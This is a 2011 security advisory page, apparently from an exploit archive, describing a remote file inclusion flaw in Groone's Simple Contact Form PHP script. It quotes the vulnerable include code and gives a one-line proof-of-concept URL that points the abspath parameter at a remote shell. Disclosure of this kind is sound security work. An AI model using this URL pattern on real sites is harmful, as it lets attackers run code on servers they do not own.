Groones Simple Contact Form (abspath) Remote File Inclusion Vulnerability

2011.11.11
Credit: g1xsystem
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

===================================================================== Groone's Simple Contact Form (abspath) RFI Vulnerability ===================================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ######################################## 1 0 I'm eidelweiss member from Inj3ct0r Team 1 1 ######################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Vendor: www.groonesworld.com download: http://www.groonesworld.com/programs/contact/contact.zip Author: eidelweiss Contact: g1xsystem[at]windowslive.com ===================================================================== Description: Groone's World Development is a site dedicated to open source development; offering a wide range of mostly free php scripts that will meet your needs. -=[ Vuln Code ]=- [-] path/contact/contact.php ------------------------------------------------------------------------ ----------- <?php $abspath = "/home/user/public_html/contact/"; /* This is groones contact form. It's a script that allows people to put a simple contact form on their website It can be downloaded from http://www.groonesworld.com/ License: GPL Thank you, Russell H. Bennett, Jr. */ include($abspath.'inc/settings.inc.php'); // <= 1 -------- function mailok($usermsg) { global $abspath; include($abspath."inc/badwords.inc.php"); // <= 2 $usermsg = strtoupper($usermsg); $tmpbad = strtoupper($badwords); $badwords = explode(",",$tmpbad); $ding = "GOOD"; $i = 0; ------------------------------------------------------------------------ ----------- -=[ P0C ]=- http://127.0.0.1/path/contact/contact.php?abspath= [inj3ct0r sh3ll] =========================| -=[ E0F ]=- |=========================

Referencje:

http://www.vupen.com/english/advisories/2010/1291
http://www.securityfocus.com/archive/1/archive/1/511551/100/0/threaded
http://packetstormsecurity.org/1005-exploits/groonescf-rfi.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top